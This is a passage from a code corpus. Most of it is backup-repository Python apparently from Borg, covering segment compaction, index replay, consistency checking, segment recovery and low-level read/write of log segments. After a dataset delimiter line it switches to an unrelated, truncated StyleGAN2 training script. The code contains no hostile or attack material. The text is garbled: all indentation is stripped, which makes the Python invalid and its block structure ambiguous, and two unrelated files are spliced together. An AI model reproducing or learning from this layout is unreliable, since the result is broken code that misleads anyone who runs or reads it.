if segment_size > 0.2 * self.max_segment_size and freeable_space < 0.15 * segment_size:
logger.debug('not compacting segment %d (only %d bytes are sparse)', segment, freeable_space)
pi.show()
continue
segments.setdefault(segment, 0)
logger.debug('compacting segment %d with usage count %d and %d freeable bytes',
segment, segments[segment], freeable_space)
for tag, key, offset, data in self.io.iter_objects(segment, include_data=True):
if tag == TAG_COMMIT:
continue
in_index = self.index.get(key)
is_index_object = in_index == (segment, offset)
if tag == TAG_PUT and is_index_object:
try:
new_segment, offset = self.io.write_put(key, data, raise_full=True)
except LoggedIO.SegmentFull:
complete_xfer()
new_segment, offset = self.io.write_put(key, data)
self.index[key] = new_segment, offset
segments.setdefault(new_segment, 0)
segments[new_segment] += 1
segments[segment] -= 1
elif tag == TAG_PUT and not is_index_object:
# If this is a PUT shadowed by a later tag, then it will be gone when this segment is deleted after
# this loop. Therefore it is removed from the shadow index.
try:
self.shadow_index[key].remove(segment)
except (KeyError, ValueError):
# do not remove entry with empty shadowed_segments list here,
# it is needed for shadowed_put_exists code (see below)!
pass
elif tag == TAG_DELETE and not in_index:
# If the shadow index doesn't contain this key, then we can't say if there's a shadowed older tag,
# therefore we do not drop the delete, but write it to a current segment.
shadowed_put_exists = key not in self.shadow_index or any(
# If the key is in the shadow index and there is any segment with an older PUT of this
# key, we have a shadowed put.
shadowed < segment for shadowed in self.shadow_index[key])
delete_is_not_stable = index_transaction_id is None or segment > index_transaction_id
if shadowed_put_exists or delete_is_not_stable:
# (introduced in 6425d16aa84be1eaaf88)
# This is needed to avoid object un-deletion if we crash between the commit and the deletion
# of old segments in complete_xfer().
#
# However, this only happens if the crash also affects the FS to the effect that file deletions
# did not materialize consistently after journal recovery. If they always materialize in-order
# then this is not a problem, because the old segment containing a deleted object would be deleted
# before the segment containing the delete.
#
# Consider the following series of operations if we would not do this, ie. this entire if:
# would be removed.
# Columns are segments, lines are different keys (line 1 = some key, line 2 = some other key)
# Legend: P=TAG_PUT, D=TAG_DELETE, c=commit, i=index is written for latest commit
#
# Segment | 1 | 2 | 3
# --------+-------+-----+------
# Key 1 | P | D |
# Key 2 | P | | P
# commits | c i | c | c i
# --------+-------+-----+------
# ^- compact_segments starts
# ^- complete_xfer commits, after that complete_xfer deletes
# segments 1 and 2 (and then the index would be written).
#
# Now we crash. But only segment 2 gets deleted, while segment 1 is still around. Now key 1
# is suddenly undeleted (because the delete in segment 2 is now missing).
# Again, note the requirement here. We delete these in the correct order that this doesn't happen,
# and only if the FS materialization of these deletes is reordered or parts dropped this can happen.
# In this case it doesn't cause outright corruption, 'just' an index count mismatch, which will be
# fixed by borg-check --repair.
#
# Note that in this check the index state is the proxy for a "most definitely settled" repository state,
# ie. the assumption is that *all* operations on segments <= index state are completed and stable.
try:
new_segment, size = self.io.write_delete(key, raise_full=True)
except LoggedIO.SegmentFull:
complete_xfer()
new_segment, size = self.io.write_delete(key)
self.compact[new_segment] += size
segments.setdefault(new_segment, 0)
else:
# we did not keep the delete tag for key (see if-branch)
if not self.shadow_index[key]:
# shadowed segments list is empty -> remove it
del self.shadow_index[key]
assert segments[segment] == 0, 'Corrupted segment reference count - corrupted index or hints'
unused.append(segment)
pi.show()
pi.finish()
complete_xfer(intermediate=False)
logger.debug('compaction completed.')
def replay_segments(self, index_transaction_id, segments_transaction_id):
# fake an old client, so that in case we do not have an exclusive lock yet, prepare_txn will upgrade the lock:
remember_exclusive = self.exclusive
self.exclusive = None
self.prepare_txn(index_transaction_id, do_cleanup=False)
try:
segment_count = sum(1 for _ in self.io.segment_iterator())
pi = ProgressIndicatorPercent(total=segment_count, msg='Replaying segments %3.0f%%',
msgid='repository.replay_segments')
for i, (segment, filename) in enumerate(self.io.segment_iterator()):
pi.show(i)
if index_transaction_id is not None and segment <= index_transaction_id:
continue
if segment > segments_transaction_id:
break
objects = self.io.iter_objects(segment)
self._update_index(segment, objects)
pi.finish()
self.write_index()
finally:
self.exclusive = remember_exclusive
self.rollback()
def _update_index(self, segment, objects, report=None):
"""some code shared between replay_segments and check"""
self.segments[segment] = 0
for tag, key, offset, size in objects:
if tag == TAG_PUT:
try:
# If this PUT supersedes an older PUT, mark the old segment for compaction and count the free space
s, _ = self.index[key]
self.compact[s] += size
self.segments[s] -= 1
except KeyError:
pass
self.index[key] = segment, offset
self.segments[segment] += 1
self.storage_quota_use += size
elif tag == TAG_DELETE:
try:
# if the deleted PUT is not in the index, there is nothing to clean up
s, offset = self.index.pop(key)
except KeyError:
pass
else:
if self.io.segment_exists(s):
# the old index is not necessarily valid for this transaction (e.g. compaction); if the segment
# is already gone, then it was already compacted.
self.segments[s] -= 1
size = self.io.read(s, offset, key, read_data=False)
self.storage_quota_use -= size
self.compact[s] += size
elif tag == TAG_COMMIT:
continue
else:
msg = 'Unexpected tag {} in segment {}'.format(tag, segment)
if report is None:
raise self.CheckNeeded(msg)
else:
report(msg)
if self.segments[segment] == 0:
self.compact[segment] += self.io.segment_size(segment)
def _rebuild_sparse(self, segment):
"""Rebuild sparse bytes count for a single segment relative to the current index."""
try:
segment_size = self.io.segment_size(segment)
except FileNotFoundError:
# segment does not exist any more, remove it from the mappings
# note: no need to self.compact.pop(segment), as we start from empty mapping.
self.segments.pop(segment)
return
if self.segments[segment] == 0:
self.compact[segment] = segment_size
return
self.compact[segment] = 0
for tag, key, offset, size in self.io.iter_objects(segment, read_data=False):
if tag == TAG_PUT:
if self.index.get(key, (-1, -1)) != (segment, offset):
# This PUT is superseded later
self.compact[segment] += size
elif tag == TAG_DELETE:
# The outcome of the DELETE has been recorded in the PUT branch already
self.compact[segment] += size
def check(self, repair=False, save_space=False):
"""Check repository consistency
This method verifies all segment checksums and makes sure
the index is consistent with the data stored in the segments.
"""
if self.append_only and repair:
raise ValueError(self.path + " is in append-only mode")
error_found = False
def report_error(msg):
nonlocal error_found
error_found = True
logger.error(msg)
logger.info('Starting repository check')
assert not self._active_txn
try:
transaction_id = self.get_transaction_id()
current_index = self.open_index(transaction_id)
logger.debug('Read committed index of transaction %d', transaction_id)
except Exception as exc:
transaction_id = self.io.get_segments_transaction_id()
current_index = None
logger.debug('Failed to read committed index (%s)', exc)
if transaction_id is None:
logger.debug('No segments transaction found')
transaction_id = self.get_index_transaction_id()
if transaction_id is None:
logger.debug('No index transaction found, trying latest segment')
transaction_id = self.io.get_latest_segment()
if transaction_id is None:
report_error('This repository contains no valid data.')
return False
if repair:
self.io.cleanup(transaction_id)
segments_transaction_id = self.io.get_segments_transaction_id()
logger.debug('Segment transaction is %s', segments_transaction_id)
logger.debug('Determined transaction is %s', transaction_id)
self.prepare_txn(None) # self.index, self.compact, self.segments all empty now!
segment_count = sum(1 for _ in self.io.segment_iterator())
logger.debug('Found %d segments', segment_count)
pi = ProgressIndicatorPercent(total=segment_count, msg='Checking segments %3.1f%%', step=0.1,
msgid='repository.check')
for i, (segment, filename) in enumerate(self.io.segment_iterator()):
pi.show(i)
if segment > transaction_id:
continue
logger.debug('checking segment file %s...', filename)
try:
objects = list(self.io.iter_objects(segment))
except IntegrityError as err:
report_error(str(err))
objects = []
if repair:
self.io.recover_segment(segment, filename)
objects = list(self.io.iter_objects(segment))
self._update_index(segment, objects, report_error)
pi.finish()
# self.index, self.segments, self.compact now reflect the state of the segment files up to <transaction_id>
# We might need to add a commit tag if no committed segment is found
if repair and segments_transaction_id is None:
report_error('Adding commit tag to segment {}'.format(transaction_id))
self.io.segment = transaction_id + 1
self.io.write_commit()
logger.info('Starting repository index check')
if current_index and not repair:
# current_index = "as found on disk"
# self.index = "as rebuilt in-memory from segments"
if len(current_index) != len(self.index):
report_error('Index object count mismatch.')
logger.error('committed index: %d objects', len(current_index))
logger.error('rebuilt index: %d objects', len(self.index))
else:
logger.info('Index object count match.')
line_format = 'ID: %-64s rebuilt index: %-16s committed index: %-16s'
not_found = '<not found>'
for key, value in self.index.iteritems():
current_value = current_index.get(key, not_found)
if current_value != value:
logger.warning(line_format, bin_to_hex(key), value, current_value)
for key, current_value in current_index.iteritems():
if key in self.index:
continue
value = self.index.get(key, not_found)
if current_value != value:
logger.warning(line_format, bin_to_hex(key), value, current_value)
if repair:
self.compact_segments()
self.write_index()
self.rollback()
if error_found:
if repair:
logger.info('Completed repository check, errors found and repaired.')
else:
logger.error('Completed repository check, errors found.')
else:
logger.info('Completed repository check, no problems found.')
return not error_found or repair
def scan_low_level(self):
"""Very low level scan over all segment file entries.
It does NOT care about what's committed and what not.
It does NOT care whether an object might be deleted or superceded later.
It just yields anything it finds in the segment files.
This is intended as a last-resort way to get access to all repo contents of damaged repos,
when there is uncommitted, but valuable data in there...
"""
for segment, filename in self.io.segment_iterator():
try:
for tag, key, offset, data in self.io.iter_objects(segment, include_data=True):
yield key, data, tag, segment, offset
except IntegrityError as err:
logger.error('Segment %d (%s) has IntegrityError(s) [%s] - skipping.' % (segment, filename, str(err)))
def _rollback(self, *, cleanup):
"""
"""
if cleanup:
self.io.cleanup(self.io.get_segments_transaction_id())
self.index = None
self._active_txn = False
self.transaction_doomed = None
def rollback(self):
# note: when used in remote mode, this is time limited, see RemoteRepository.shutdown_time.
self._rollback(cleanup=False)
def __len__(self):
if not self.index:
self.index = self.open_index(self.get_transaction_id())
return len(self.index)
def __contains__(self, id):
if not self.index:
self.index = self.open_index(self.get_transaction_id())
return id in self.index
def list(self, limit=None, marker=None):
"""
list <limit> IDs starting from after id <marker> - in index (pseudo-random) order.
"""
if not self.index:
self.index = self.open_index(self.get_transaction_id())
return [id_ for id_, _ in islice(self.index.iteritems(marker=marker), limit)]
def scan(self, limit=None, marker=None):
"""
list <limit> IDs starting from after id <marker> - in on-disk order, so that a client
fetching data in this order does linear reads and reuses stuff from disk cache.
We rely on repository.check() has run already (either now or some time before) and that:
- if we are called from a borg check command, self.index is a valid, fresh, in-sync repo index.
- if we are called from elsewhere, either self.index or the on-disk index is valid and in-sync.
- the repository segments are valid (no CRC errors).
if we encounter CRC errors in segment entry headers, rest of segment is skipped.
"""
if limit is not None and limit < 1:
raise ValueError('please use limit > 0 or limit = None')
if not self.index:
transaction_id = self.get_transaction_id()
self.index = self.open_index(transaction_id)
at_start = marker is None
# smallest valid seg is <uint32> 0, smallest valid offs is <uint32> 8
start_segment, start_offset = (0, 0) if at_start else self.index[marker]
result = []
for segment, filename in self.io.segment_iterator(start_segment):
obj_iterator = self.io.iter_objects(segment, start_offset, read_data=False, include_data=False)
while True:
try:
tag, id, offset, size = next(obj_iterator)
except (StopIteration, IntegrityError):
# either end-of-segment or an error - we can not seek to objects at
# higher offsets than one that has an error in the header fields
break
if start_offset > 0:
# we are using a marker and the marker points to the last object we have already
# returned in the previous scan() call - thus, we need to skip this one object.
# also, for the next segment, we need to start at offset 0.
start_offset = 0
continue
if tag == TAG_PUT and (segment, offset) == self.index.get(id):
# we have found an existing and current object
result.append(id)
if len(result) == limit:
return result
return result
def get(self, id):
if not self.index:
self.index = self.open_index(self.get_transaction_id())
try:
segment, offset = self.index[id]
return self.io.read(segment, offset, id)
except KeyError:
raise self.ObjectNotFound(id, self.path) from None
def get_many(self, ids, is_preloaded=False):
for id_ in ids:
yield self.get(id_)
def put(self, id, data, wait=True):
"""put a repo object
Note: when doing calls with wait=False this gets async and caller must
deal with async results / exceptions later.
"""
if not self._active_txn:
self.prepare_txn(self.get_transaction_id())
try:
segment, offset = self.index[id]
except KeyError:
pass
else:
# note: doing a delete first will do some bookkeeping.
# we do not want to update the shadow_index here, because
# we know already that we will PUT to this id, so it will
# be in the repo index (and we won't need it in the shadow_index).
self._delete(id, segment, offset, update_shadow_index=False)
segment, offset = self.io.write_put(id, data)
self.storage_quota_use += len(data) + self.io.put_header_fmt.size
self.segments.setdefault(segment, 0)
self.segments[segment] += 1
self.index[id] = segment, offset
if self.storage_quota and self.storage_quota_use > self.storage_quota:
self.transaction_doomed = self.StorageQuotaExceeded(
format_file_size(self.storage_quota), format_file_size(self.storage_quota_use))
raise self.transaction_doomed
def delete(self, id, wait=True):
"""delete a repo object
Note: when doing calls with wait=False this gets async and caller must
deal with async results / exceptions later.
"""
if not self._active_txn:
self.prepare_txn(self.get_transaction_id())
try:
segment, offset = self.index.pop(id)
except KeyError:
raise self.ObjectNotFound(id, self.path) from None
# if we get here, there is an object with this id in the repo,
# we write a DEL here that shadows the respective PUT.
# after the delete, the object is not in the repo index any more,
# for the compaction code, we need to update the shadow_index in this case.
self._delete(id, segment, offset, update_shadow_index=True)
def _delete(self, id, segment, offset, *, update_shadow_index):
# common code used by put and delete
if update_shadow_index:
self.shadow_index.setdefault(id, []).append(segment)
self.segments[segment] -= 1
size = self.io.read(segment, offset, id, read_data=False)
self.storage_quota_use -= size
self.compact[segment] += size
segment, size = self.io.write_delete(id)
self.compact[segment] += size
self.segments.setdefault(segment, 0)
def async_response(self, wait=True):
"""Get one async result (only applies to remote repositories).
async commands (== calls with wait=False, e.g. delete and put) have no results,
but may raise exceptions. These async exceptions must get collected later via
async_response() calls. Repeat the call until it returns None.
The previous calls might either return one (non-None) result or raise an exception.
If wait=True is given and there are outstanding responses, it will wait for them
to arrive. With wait=False, it will only return already received responses.
"""
def preload(self, ids):
"""Preload objects (only applies to remote repositories)
"""
class LoggedIO:
class SegmentFull(Exception):
"""raised when a segment is full, before opening next"""
header_fmt = struct.Struct('<IIB')
assert header_fmt.size == 9
put_header_fmt = struct.Struct('<IIB32s')
assert put_header_fmt.size == 41
header_no_crc_fmt = struct.Struct('<IB')
assert header_no_crc_fmt.size == 5
crc_fmt = struct.Struct('<I')
assert crc_fmt.size == 4
_commit = header_no_crc_fmt.pack(9, TAG_COMMIT)
COMMIT = crc_fmt.pack(crc32(_commit)) + _commit
def __init__(self, path, limit, segments_per_dir, capacity=90):
self.path = path
self.fds = LRUCache(capacity, dispose=self._close_fd)
self.segment = 0
self.limit = limit
self.segments_per_dir = segments_per_dir
self.offset = 0
self._write_fd = None
self._fds_cleaned = 0
def close(self):
self.close_segment()
self.fds.clear()
self.fds = None # Just to make sure we're disabled
def _close_fd(self, ts_fd):
ts, fd = ts_fd
safe_fadvise(fd.fileno(), 0, 0, 'DONTNEED')
fd.close()
def segment_iterator(self, segment=None, reverse=False):
if segment is None:
segment = 0 if not reverse else 2 ** 32 - 1
data_path = os.path.join(self.path, 'data')
start_segment_dir = segment // self.segments_per_dir
dirs = os.listdir(data_path)
if not reverse:
dirs = [dir for dir in dirs if dir.isdigit() and int(dir) >= start_segment_dir]
else:
dirs = [dir for dir in dirs if dir.isdigit() and int(dir) <= start_segment_dir]
dirs = sorted(dirs, key=int, reverse=reverse)
for dir in dirs:
filenames = os.listdir(os.path.join(data_path, dir))
if not reverse:
filenames = [filename for filename in filenames if filename.isdigit() and int(filename) >= segment]
else:
filenames = [filename for filename in filenames if filename.isdigit() and int(filename) <= segment]
filenames = sorted(filenames, key=int, reverse=reverse)
for filename in filenames:
# Note: Do not filter out logically deleted segments (see "File system interaction" above),
# since this is used by cleanup and txn state detection as well.
yield int(filename), os.path.join(data_path, dir, filename)
def get_latest_segment(self):
for segment, filename in self.segment_iterator(reverse=True):
return segment
return None
def get_segments_transaction_id(self):
"""Return the last committed segment.
"""
for segment, filename in self.segment_iterator(reverse=True):
if self.is_committed_segment(segment):
return segment
return None
def cleanup(self, transaction_id):
"""Delete segment files left by aborted transactions
"""
self.segment = transaction_id + 1
count = 0
for segment, filename in self.segment_iterator(reverse=True):
if segment > transaction_id:
if segment in self.fds:
del self.fds[segment]
truncate_and_unlink(filename)
count += 1
else:
break
logger.debug('Cleaned up %d uncommitted segment files (== everything after segment %d).',
count, transaction_id)
def is_committed_segment(self, segment):
"""Check if segment ends with a COMMIT_TAG tag
"""
try:
iterator = self.iter_objects(segment)
except IntegrityError:
return False
with open(self.segment_filename(segment), 'rb') as fd:
try:
fd.seek(-self.header_fmt.size, os.SEEK_END)
except OSError as e:
# return False if segment file is empty or too small
if e.errno == errno.EINVAL:
return False
raise e
if fd.read(self.header_fmt.size) != self.COMMIT:
return False
seen_commit = False
while True:
try:
tag, key, offset, _ = next(iterator)
except IntegrityError:
return False
except StopIteration:
break
if tag == TAG_COMMIT:
seen_commit = True
continue
if seen_commit:
return False
return seen_commit
def segment_filename(self, segment):
return os.path.join(self.path, 'data', str(segment // self.segments_per_dir), str(segment))
def get_write_fd(self, no_new=False, raise_full=False):
if not no_new and self.offset and self.offset > self.limit:
if raise_full:
raise self.SegmentFull
self.close_segment()
if not self._write_fd:
if self.segment % self.segments_per_dir == 0:
dirname = os.path.join(self.path, 'data', str(self.segment // self.segments_per_dir))
if not os.path.exists(dirname):
os.mkdir(dirname)
sync_dir(os.path.join(self.path, 'data'))
self._write_fd = SyncFile(self.segment_filename(self.segment), binary=True)
self._write_fd.write(MAGIC)
self.offset = MAGIC_LEN
if self.segment in self.fds:
# we may have a cached fd for a segment file we already deleted and
# we are writing now a new segment file to same file name. get rid of
# of the cached fd that still refers to the old file, so it will later
# get repopulated (on demand) with a fd that refers to the new file.
del self.fds[self.segment]
return self._write_fd
def get_fd(self, segment):
# note: get_fd() returns a fd with undefined file pointer position,
# so callers must always seek() to desired position afterwards.
now = time.monotonic()
def open_fd():
fd = open(self.segment_filename(segment), 'rb')
self.fds[segment] = (now, fd)
return fd
def clean_old():
# we regularly get rid of all old FDs here:
if now - self._fds_cleaned > FD_MAX_AGE // 8:
self._fds_cleaned = now
for k, ts_fd in list(self.fds.items()):
ts, fd = ts_fd
if now - ts > FD_MAX_AGE:
# we do not want to touch long-unused file handles to
# avoid ESTALE issues (e.g. on network filesystems).
del self.fds[k]
clean_old()
try:
ts, fd = self.fds[segment]
except KeyError:
fd = open_fd()
else:
# we only have fresh enough stuff here.
# update the timestamp of the lru cache entry.
self.fds.upd(segment, (now, fd))
return fd
def close_segment(self):
# set self._write_fd to None early to guard against reentry from error handling code paths:
fd, self._write_fd = self._write_fd, None
if fd is not None:
self.segment += 1
self.offset = 0
fd.close()
def delete_segment(self, segment):
if segment in self.fds:
del self.fds[segment]
try:
truncate_and_unlink(self.segment_filename(segment))
except FileNotFoundError:
pass
def segment_exists(self, segment):
filename = self.segment_filename(segment)
# When deleting segments, they are first truncated. If truncate(2) and unlink(2) are split
# across FS transactions, then logically deleted segments will show up as truncated.
return os.path.exists(filename) and os.path.getsize(filename)
def segment_size(self, segment):
return os.path.getsize(self.segment_filename(segment))
def get_segment_magic(self, segment):
fd = self.get_fd(segment)
fd.seek(0)
return fd.read(MAGIC_LEN)
def iter_objects(self, segment, offset=0, include_data=False, read_data=True):
"""
Return object iterator for *segment*.
If read_data is False then include_data must be False as well.
Integrity checks are skipped: all data obtained from the iterator must be considered informational.
The iterator returns four-tuples of (tag, key, offset, data|size).
"""
fd = self.get_fd(segment)
fd.seek(offset)
if offset == 0:
# we are touching this segment for the first time, check the MAGIC.
# Repository.scan() calls us with segment > 0 when it continues an ongoing iteration
# from a marker position - but then we have checked the magic before already.
if fd.read(MAGIC_LEN) != MAGIC:
raise IntegrityError('Invalid segment magic [segment {}, offset {}]'.format(segment, 0))
offset = MAGIC_LEN
header = fd.read(self.header_fmt.size)
while header:
size, tag, key, data = self._read(fd, self.header_fmt, header, segment, offset,
(TAG_PUT, TAG_DELETE, TAG_COMMIT),
read_data=read_data)
if include_data:
yield tag, key, offset, data
else:
yield tag, key, offset, size
offset += size
# we must get the fd via get_fd() here again as we yielded to our caller and it might
# have triggered closing of the fd we had before (e.g. by calling io.read() for
# different segment(s)).
# by calling get_fd() here again we also make our fd "recently used" so it likely
# does not get kicked out of self.fds LRUcache.
fd = self.get_fd(segment)
fd.seek(offset)
header = fd.read(self.header_fmt.size)
def recover_segment(self, segment, filename):
logger.info('attempting to recover ' + filename)
if segment in self.fds:
del self.fds[segment]
if os.path.getsize(filename) < MAGIC_LEN + self.header_fmt.size:
# this is either a zero-byte file (which would crash mmap() below) or otherwise
# just too small to be a valid non-empty segment file, so do a shortcut here:
with SaveFile(filename, binary=True) as fd:
fd.write(MAGIC)
return
with SaveFile(filename, binary=True) as dst_fd:
with open(filename, 'rb') as src_fd:
# note: file must not be 0 size or mmap() will crash.
with mmap.mmap(src_fd.fileno(), 0, access=mmap.ACCESS_READ) as mm:
# memoryview context manager is problematic, see https://bugs.python.org/issue35686
data = memoryview(mm)
d = data
try:
dst_fd.write(MAGIC)
while len(d) >= self.header_fmt.size:
crc, size, tag = self.header_fmt.unpack(d[:self.header_fmt.size])
if size < self.header_fmt.size or size > len(d):
d = d[1:]
continue
if crc32(d[4:size]) & 0xffffffff != crc:
d = d[1:]
continue
dst_fd.write(d[:size])
d = d[size:]
finally:
del d
data.release()
def read(self, segment, offset, id, read_data=True):
"""
Read entry from *segment* at *offset* with *id*.
If read_data is False the size of the entry is returned instead and integrity checks are skipped.
The return value should thus be considered informational.
"""
if segment == self.segment and self._write_fd:
self._write_fd.sync()
fd = self.get_fd(segment)
fd.seek(offset)
header = fd.read(self.put_header_fmt.size)
size, tag, key, data = self._read(fd, self.put_header_fmt, header, segment, offset, (TAG_PUT, ), read_data)
if id != key:
raise IntegrityError('Invalid segment entry header, is not for wanted id [segment {}, offset {}]'.format(
segment, offset))
return data if read_data else size
def _read(self, fd, fmt, header, segment, offset, acceptable_tags, read_data=True):
# some code shared by read() and iter_objects()
try:
hdr_tuple = fmt.unpack(header)
except struct.error as err:
raise IntegrityError('Invalid segment entry header [segment {}, offset {}]: {}'.format(
segment, offset, err)) from None
if fmt is self.put_header_fmt:
crc, size, tag, key = hdr_tuple
elif fmt is self.header_fmt:
crc, size, tag = hdr_tuple
key = None
else:
raise TypeError("_read called with unsupported format")
if size > MAX_OBJECT_SIZE:
# if you get this on an archive made with borg < 1.0.7 and millions of files and
# you need to restore it, you can disable this check by using "if False:" above.
raise IntegrityError('Invalid segment entry size {} - too big [segment {}, offset {}]'.format(
size, segment, offset))
if size < fmt.size:
raise IntegrityError('Invalid segment entry size {} - too small [segment {}, offset {}]'.format(
size, segment, offset))
length = size - fmt.size
if read_data:
data = fd.read(length)
if len(data) != length:
raise IntegrityError('Segment entry data short read [segment {}, offset {}]: expected {}, got {} bytes'.format(
segment, offset, length, len(data)))
if crc32(data, crc32(memoryview(header)[4:])) & 0xffffffff != crc:
raise IntegrityError('Segment entry checksum mismatch [segment {}, offset {}]'.format(
segment, offset))
if key is None and tag in (TAG_PUT, TAG_DELETE):
key, data = data[:32], data[32:]
else:
if key is None and tag in (TAG_PUT, TAG_DELETE):
key = fd.read(32)
length -= 32
if len(key) != 32:
raise IntegrityError('Segment entry key short read [segment {}, offset {}]: expected {}, got {} bytes'.format(
segment, offset, 32, len(key)))
oldpos = fd.tell()
seeked = fd.seek(length, os.SEEK_CUR) - oldpos
data = None
if seeked != length:
raise IntegrityError('Segment entry data short seek [segment {}, offset {}]: expected {}, got {} bytes'.format(
segment, offset, length, seeked))
if tag not in acceptable_tags:
raise IntegrityError('Invalid segment entry header, did not get acceptable tag [segment {}, offset {}]'.format(
segment, offset))
return size, tag, key, data
def write_put(self, id, data, raise_full=False):
data_size = len(data)
if data_size > MAX_DATA_SIZE:
# this would push the segment entry size beyond MAX_OBJECT_SIZE.
raise IntegrityError('More than allowed put data [{} > {}]'.format(data_size, MAX_DATA_SIZE))
fd = self.get_write_fd(raise_full=raise_full)
size = data_size + self.put_header_fmt.size
offset = self.offset
header = self.header_no_crc_fmt.pack(size, TAG_PUT)
crc = self.crc_fmt.pack(crc32(data, crc32(id, crc32(header))) & 0xffffffff)
fd.write(b''.join((crc, header, id, data)))
self.offset += size
return self.segment, offset
def write_delete(self, id, raise_full=False):
fd = self.get_write_fd(raise_full=raise_full)
header = self.header_no_crc_fmt.pack(self.put_header_fmt.size, TAG_DELETE)
crc = self.crc_fmt.pack(crc32(id, crc32(header)) & 0xffffffff)
fd.write(b''.join((crc, header, id)))
self.offset += self.put_header_fmt.size
return self.segment, self.put_header_fmt.size
def write_commit(self, intermediate=False):
if intermediate:
# Intermediate commits go directly into the current segment - this makes checking their validity more
# expensive, but is faster and reduces clobber.
fd = self.get_write_fd()
fd.sync()
else:
self.close_segment()
fd = self.get_write_fd()
header = self.header_no_crc_fmt.pack(self.header_fmt.size, TAG_COMMIT)
crc = self.crc_fmt.pack(crc32(header) & 0xffffffff)
fd.write(b''.join((crc, header)))
self.close_segment()
return self.segment - 1 # close_segment() increments it
assert LoggedIO.put_header_fmt.size == 41 # see constants.MAX_OBJECT_SIZE
|
py | 7dfa9448c914138c6d8b7efc4f5b89975b3dbdbc | """
---
title: StyleGAN 2 Model Training
summary: >
An annotated PyTorch implementation of StyleGAN2 model training code.
---
# [StyleGAN 2](index.html) Model Training
This is the training code for [StyleGAN 2](index.html) model.

---*These are $64 \times 64$ images generated after training for about 80K steps.*---
*Our implementation is a minimalistic StyleGAN 2 model training code.
Only single GPU training is supported to keep the implementation simple.
We managed to shrink it to keep it at less than 500 lines of code, including the training loop.*
*Without DDP (distributed data parallel) and multi-gpu training it will not be possible to train the model
for large resolutions (128+).
If you want training code with fp16 and DDP take a look at
[lucidrains/stylegan2-pytorch](https://github.com/lucidrains/stylegan2-pytorch).*
We trained this on [CelebA-HQ dataset](https://github.com/tkarras/progressive_growing_of_gans).
You can find the download instruction in this
[discussion on fast.ai](https://forums.fast.ai/t/download-celeba-hq-dataset/45873/3).
Save the images inside [`data/stylegan` folder](#dataset_path).
"""
import math
from pathlib import Path
from typing import Iterator, Tuple
import torch
import torch.utils.data
import torchvision
from PIL import Image
from labml import tracker, lab, monit, experiment
from labml.configs import BaseConfigs
from labml_helpers.device import DeviceConfigs
from labml_helpers.train_valid import ModeState, hook_model_outputs
from labml_nn.gan.stylegan import Discriminator, Generator, MappingNetwork, GradientPenalty, PathLengthPenalty
from labml_nn.gan.wasserstein import DiscriminatorLoss, GeneratorLoss
from labml_nn.utils import cycle_dataloader
class Dataset(torch.utils.data.Dataset):
"""
## Dataset
This loads the training dataset and resize it to the give image size.
"""
def __init__(self, path: str, image_size: int):
"""
* `path` path to the folder containing the images
* `image_size` size of the image
"""
super().__init__()
# Get the paths of all `jpg` files
self.paths = [p for p in Path(path).glob(f'**/*.jpg')]
# Transformation
self.transform = torchvision.transforms.Compose([
# Resize the image
torchvision.transforms.Resize(image_size),
# Convert to PyTorch tensor
torchvision.transforms.ToTensor(),
])
def __len__(self):
"""Number of images"""
return len(self.paths)
def __getitem__(self, index):
"""Get the the `index`-th image"""
path = self.paths[index]
img = Image.open(path)
return self.transform(img)
class Configs(BaseConfigs):
"""
## Configurations
"""
# Device to train the model on.
# [`DeviceConfigs`](https://docs.labml.ai/api/helpers.html#labml_helpers.device.DeviceConfigs)
# picks up an available CUDA device or defaults to CPU.
device: torch.device = DeviceConfigs()
# [StyleGAN2 Discriminator](index.html#discriminator)
discriminator: Discriminator
# [StyleGAN2 Generator](index.html#generator)
generator: Generator
# [Mapping network](index.html#mapping_network)
mapping_network: MappingNetwork
# Discriminator and generator loss functions.
# We use [Wasserstein loss](../wasserstein/index.html)
discriminator_loss: DiscriminatorLoss
generator_loss: GeneratorLoss
# Optimizers
generator_optimizer: torch.optim.Adam
discriminator_optimizer: torch.optim.Adam
mapping_network_optimizer: torch.optim.Adam
# [Gradient Penalty Regularization Loss](index.html#gradient_penalty)
gradient_penalty = GradientPenalty()
# Gradient penalty coefficient $\gamma$
gradient_penalty_coefficient: float = 10.
# [Path length penalty](index.html#path_length_penalty)
path_length_penalty: PathLengthPenalty
# Data loader
loader: Iterator
# Batch size
batch_size: int = 32
# Dimensionality of $z$ and $w$
d_latent: int = 512
# Height/width of the image
image_size: int = 32
# Number of layers in the mapping network
mapping_network_layers: int = 8
# Generator & Discriminator learning rate
learning_rate: float = 1e-3
# Mapping network learning rate ($100 \times$ lower than the others)
mapping_network_learning_rate: float = 1e-5
# Number of steps to accumulate gradients on. Use this to increase the effective batch size.
gradient_accumulate_steps: int = 1
# $\beta_1$ and $\beta_2$ for Adam optimizer
adam_betas: Tuple[float, float] = (0.0, 0.99)
# Probability of mixing styles
style_mixing_prob: float = 0.9
# Total number of training steps
training_steps: int = 150_000
# Number of blocks in the generator (calculated based on image resolution)
n_gen_blocks: int
# ### Lazy regularization
# Instead of calculating the regularization losses, the paper proposes lazy regularization
# where the regularization terms are calculated once in a while.
# This improves the training efficiency a lot.
# The interval at which to compute gradient penalty
lazy_gradient_penalty_interval: int = 4
# Path length penalty calculation interval
lazy_path_penalty_interval: int = 32
# Skip calculating path length penalty during the initial phase of training
lazy_path_penalty_after: int = 5_000
# How often to log generated images
log_generated_interval: int = 500
# How often to save model checkpoints
save_checkpoint_interval: int = 2_000
# Training mode state for logging activations
mode: ModeState
# Whether to log model layer outputs
log_layer_outputs: bool = False
# <a id="dataset_path"></a>
# We trained this on [CelebA-HQ dataset](https://github.com/tkarras/progressive_growing_of_gans).
# You can find the download instruction in this
# [discussion on fast.ai](https://forums.fast.ai/t/download-celeba-hq-dataset/45873/3).
# Save the images inside `data/stylegan` folder.
dataset_path: str = str(lab.get_data_path() / 'stylegan2')
def init(self):
"""
### Initialize
"""
# Create dataset
dataset = Dataset(self.dataset_path, self.image_size)
# Create data loader
dataloader = torch.utils.data.DataLoader(dataset, batch_size=self.batch_size, num_workers=8,
shuffle=True, drop_last=True, pin_memory=True)
# Continuous [cyclic loader](../../utils.html#cycle_dataloader)
self.loader = cycle_dataloader(dataloader)
# $\log_2$ of image resolution
log_resolution = int(math.log2(self.image_size))
# Create discriminator and generator
self.discriminator = Discriminator(log_resolution).to(self.device)
self.generator = Generator(log_resolution, self.d_latent).to(self.device)
# Get number of generator blocks for creating style and noise inputs
self.n_gen_blocks = self.generator.n_blocks
# Create mapping network
self.mapping_network = MappingNetwork(self.d_latent, self.mapping_network_layers).to(self.device)
# Create path length penalty loss
